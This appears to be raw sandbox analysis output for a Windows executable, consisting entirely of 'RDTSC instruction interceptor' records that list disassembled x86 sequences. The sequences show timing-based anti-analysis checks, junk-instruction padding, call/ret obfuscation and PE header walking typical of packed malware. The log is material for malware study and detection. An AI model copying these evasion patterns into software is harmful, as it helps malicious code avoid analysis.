Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA3CF0 second address: CA3CF6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA4DD4 second address: CA4DD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA7B2E second address: CA7BA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2EE8E96BD6h 0x00000009 popad 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e cld 0x0000000f mov dword ptr [ebp+1246E696h], edx 0x00000015 push 00000000h 0x00000017 xor bx, 1CDDh 0x0000001c jmp 00007F2EE8E96BCCh 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push esi 0x00000026 call 00007F2EE8E96BC8h 0x0000002b pop esi 0x0000002c mov dword ptr [esp+04h], esi 0x00000030 add dword ptr [esp+04h], 00000017h 0x00000038 inc esi 0x00000039 push esi 0x0000003a ret 0x0000003b pop esi 0x0000003c ret 0x0000003d mov dword ptr [ebp+122D33E2h], ebx 0x00000043 mov ebx, eax 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007F2EE8E96BD0h 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAAC54 second address: CAAC58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAAC58 second address: CAAC5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAAC5E second address: CAAC6B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CACD5F second address: CACD9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 nop 0x00000006 clc 0x00000007 push 00000000h 0x00000009 sub dword ptr [ebp+12457AC8h], eax 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F2EE8E96BC8h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 00000014h 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b mov edi, dword ptr [ebp+122D1B7Eh] 0x00000031 push eax 0x00000032 push edi 0x00000033 push eax 0x00000034 push edx 0x00000035 ja 00007F2EE8E96BC6h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAED39 second address: CAED3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CABEBC second address: CABEC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CABEC0 second address: CABECA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAFD47 second address: CAFD4D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAFD4D second address: CAFD62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2EE8DE7701h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAFD62 second address: CAFD79 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F2EE8E96BC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 jl 00007F2EE8E96BC6h 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB0E71 second address: CB0E76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB0E76 second address: CB0E7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB20EA second address: CB2107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F2EE8DE7702h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB2107 second address: CB21A1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a xor dword ptr [ebp+122D2FF5h], eax 0x00000010 pop ebx 0x00000011 push dword ptr fs:[00000000h] 0x00000018 mov dword ptr [ebp+122D1971h], edi 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 push 00000000h 0x00000027 push eax 0x00000028 call 00007F2EE8E96BC8h 0x0000002d pop eax 0x0000002e mov dword ptr [esp+04h], eax 0x00000032 add dword ptr [esp+04h], 00000019h 0x0000003a inc eax 0x0000003b push eax 0x0000003c ret 0x0000003d pop eax 0x0000003e ret 0x0000003f mov bh, DFh 0x00000041 and ebx, dword ptr [ebp+122D2989h] 0x00000047 mov eax, dword ptr [ebp+122D0731h] 0x0000004d push 00000000h 0x0000004f push eax 0x00000050 call 00007F2EE8E96BC8h 0x00000055 pop eax 0x00000056 mov dword ptr [esp+04h], eax 0x0000005a add dword ptr [esp+04h], 0000001Dh 0x00000062 inc eax 0x00000063 push eax 0x00000064 ret 0x00000065 pop eax 0x00000066 ret 0x00000067 mov edi, dword ptr [ebp+122D2A51h] 0x0000006d push FFFFFFFFh 0x0000006f nop 0x00000070 pushad 0x00000071 push eax 0x00000072 push edx 0x00000073 jmp 00007F2EE8E96BD5h 0x00000078 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB21A1 second address: CB21AF instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F2EE8DE76F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBA310 second address: CBA325 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007F2EE8E96BCDh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB21AF second address: CB21B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBA325 second address: CBA33C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2EE8E96BD1h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB9D2D second address: CB9D33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB9D33 second address: CB9D4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007F2EE8E96BD2h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB9D4A second address: CB9D5A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F2EE8DE76FBh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC029A second address: CC02A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC02A0 second address: CC02A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC02A5 second address: CC02AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC02AB second address: CC02AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC02AF second address: CC02BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC02BE second address: CC02D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE8DE76FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC02D6 second address: CC02F6 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2EE8E96BCCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2EE8E96BCCh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC02F6 second address: CC0300 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F2EE8DE76FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC03E7 second address: CC03EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC046D second address: CC0480 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F2EE8DE76F6h 0x0000000a popad 0x0000000b jbe 00007F2EE8DE76FCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC0480 second address: AF191F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xor dword ptr [esp], 6C0E124Eh 0x0000000c clc 0x0000000d push dword ptr [ebp+122D16E1h] 0x00000013 pushad 0x00000014 mov eax, 0CA1223Eh 0x00000019 movzx esi, cx 0x0000001c popad 0x0000001d call dword ptr [ebp+122D1B7Eh] 0x00000023 pushad 0x00000024 clc 0x00000025 xor eax, eax 0x00000027 mov dword ptr [ebp+122D21DAh], edi 0x0000002d mov edx, dword ptr [esp+28h] 0x00000031 mov dword ptr [ebp+122D21DAh], eax 0x00000037 mov dword ptr [ebp+122D29C9h], eax 0x0000003d mov dword ptr [ebp+122D21DAh], edi 0x00000043 mov esi, 0000003Ch 0x00000048 jp 00007F2EE8E96BD6h 0x0000004e add esi, dword ptr [esp+24h] 0x00000052 jns 00007F2EE8E96BD6h 0x00000058 lodsw 0x0000005a cld 0x0000005b add eax, dword ptr [esp+24h] 0x0000005f pushad 0x00000060 mov esi, 3D5BD57Fh 0x00000065 movzx edx, ax 0x00000068 popad 0x00000069 mov ebx, dword ptr [esp+24h] 0x0000006d mov dword ptr [ebp+122D21DAh], edi 0x00000073 mov dword ptr [ebp+122D21DAh], ecx 0x00000079 nop 0x0000007a pushad 0x0000007b push eax 0x0000007c push edx 0x0000007d pushad 0x0000007e popad 0x0000007f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC45E8 second address: CC45F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007F2EE8DE76FAh 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC476B second address: CC476F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC476F second address: CC477A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC477A second address: CC4781 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop esi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC4781 second address: CC479A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F2EE8DE7704h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC4A62 second address: CC4A67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC4A67 second address: CC4A6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC4A6D second address: CC4A77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC4CBD second address: CC4CC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC4CC3 second address: CC4CCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F2EE8E96BC6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC4CCE second address: CC4CDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F2EE8DE76FAh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC851A second address: CC8565 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F2EE8E96BC8h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b jg 00007F2EE8E96BC6h 0x00000011 jnc 00007F2EE8E96BC6h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c pushad 0x0000001d jmp 00007F2EE8E96BD2h 0x00000022 pushad 0x00000023 push edx 0x00000024 pop edx 0x00000025 push edi 0x00000026 pop edi 0x00000027 js 00007F2EE8E96BC6h 0x0000002d popad 0x0000002e jl 00007F2EE8E96BCCh 0x00000034 jbe 00007F2EE8E96BC6h 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC8565 second address: CC8569 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCD6BF second address: CCD70D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2EE8E96BD6h 0x00000008 jmp 00007F2EE8E96BD8h 0x0000000d jmp 00007F2EE8E96BD1h 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push esi 0x00000016 js 00007F2EE8E96BCCh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCD9D3 second address: CCD9D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCD9D9 second address: CCD9F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE8E96BD0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push esi 0x0000000b pushad 0x0000000c jnl 00007F2EE8E96BC6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCDCC3 second address: CCDCDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007F2EE8DE76FBh 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCDCDA second address: CCDCDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCDCDE second address: CCDCE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCDCE8 second address: CCDCEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCDE2F second address: CCDE52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE8DE76FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F2EE8DE76FEh 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCE0E7 second address: CCE0EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCE3D8 second address: CCE3E2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2EE8DE76FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCE54C second address: CCE550 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCE6E9 second address: CCE6F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F2EE8DE76F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCD382 second address: CCD3C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2EE8E96BD0h 0x00000009 jmp 00007F2EE8E96BCFh 0x0000000e popad 0x0000000f jmp 00007F2EE8E96BD3h 0x00000014 push eax 0x00000015 push edx 0x00000016 jnc 00007F2EE8E96BC6h 0x0000001c jns 00007F2EE8E96BC6h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCD3C7 second address: CCD40C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F2EE8DE7708h 0x00000016 push esi 0x00000017 pop esi 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d jmp 00007F2EE8DE7705h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCD40C second address: CCD410 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD490C second address: CD4934 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 jl 00007F2EE8DE76F6h 0x0000000f jng 00007F2EE8DE76F6h 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 ja 00007F2EE8DE76F6h 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 jns 00007F2EE8DE76F6h 0x00000026 push ecx 0x00000027 pop ecx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD3718 second address: CD371C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD371C second address: CD3722 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD3890 second address: CD3895 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD3BC0 second address: CD3BC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD3BC6 second address: CD3BCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD418B second address: CD4191 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD4191 second address: CD4195 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5A7B0 second address: C5A7B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5A7B4 second address: C5A7BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDCB0F second address: CDCB2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2EE8DE7707h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDCB2C second address: CDCB4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F2EE8E96BCCh 0x0000000b pushad 0x0000000c jmp 00007F2EE8E96BCDh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA0C52 second address: CA0CC0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jno 00007F2EE8DE7715h 0x0000000f nop 0x00000010 xor dword ptr [ebp+122D1CEBh], edx 0x00000016 lea eax, dword ptr [ebp+12482950h] 0x0000001c mov dword ptr [ebp+122D2FBEh], ecx 0x00000022 nop 0x00000023 pushad 0x00000024 jnc 00007F2EE8DE76F8h 0x0000002a jne 00007F2EE8DE770Ch 0x00000030 jmp 00007F2EE8DE7706h 0x00000035 popad 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA0CC0 second address: CA0CC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA0CC4 second address: C7C920 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 mov edx, 134542B0h 0x0000000d call dword ptr [ebp+122D2599h] 0x00000013 jc 00007F2EE8DE7704h 0x00000019 jl 00007F2EE8DE76FEh 0x0000001f js 00007F2EE8DE76F6h 0x00000025 push ecx 0x00000026 pop ecx 0x00000027 pushad 0x00000028 jnc 00007F2EE8DE76FCh 0x0000002e pushad 0x0000002f pushad 0x00000030 popad 0x00000031 push ebx 0x00000032 pop ebx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA10E6 second address: AF191F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 push esi 0x0000000a jbe 00007F2EE8E96BC6h 0x00000010 pop esi 0x00000011 pop ebx 0x00000012 nop 0x00000013 mov ch, ACh 0x00000015 mov dword ptr [ebp+122D1BD8h], edx 0x0000001b push dword ptr [ebp+122D16E1h] 0x00000021 mov ecx, edx 0x00000023 call dword ptr [ebp+122D1B7Eh] 0x00000029 pushad 0x0000002a clc 0x0000002b xor eax, eax 0x0000002d mov dword ptr [ebp+122D21DAh], edi 0x00000033 mov edx, dword ptr [esp+28h] 0x00000037 mov dword ptr [ebp+122D21DAh], eax 0x0000003d mov dword ptr [ebp+122D29C9h], eax 0x00000043 mov dword ptr [ebp+122D21DAh], edi 0x00000049 mov esi, 0000003Ch 0x0000004e jp 00007F2EE8E96BD6h 0x00000054 add esi, dword ptr [esp+24h] 0x00000058 jns 00007F2EE8E96BD6h 0x0000005e lodsw 0x00000060 cld 0x00000061 add eax, dword ptr [esp+24h] 0x00000065 pushad 0x00000066 mov esi, 3D5BD57Fh 0x0000006b movzx edx, ax 0x0000006e popad 0x0000006f mov ebx, dword ptr [esp+24h] 0x00000073 mov dword ptr [ebp+122D21DAh], edi 0x00000079 mov dword ptr [ebp+122D21DAh], ecx 0x0000007f nop 0x00000080 pushad 0x00000081 push eax 0x00000082 push edx 0x00000083 pushad 0x00000084 popad 0x00000085 rdtsc
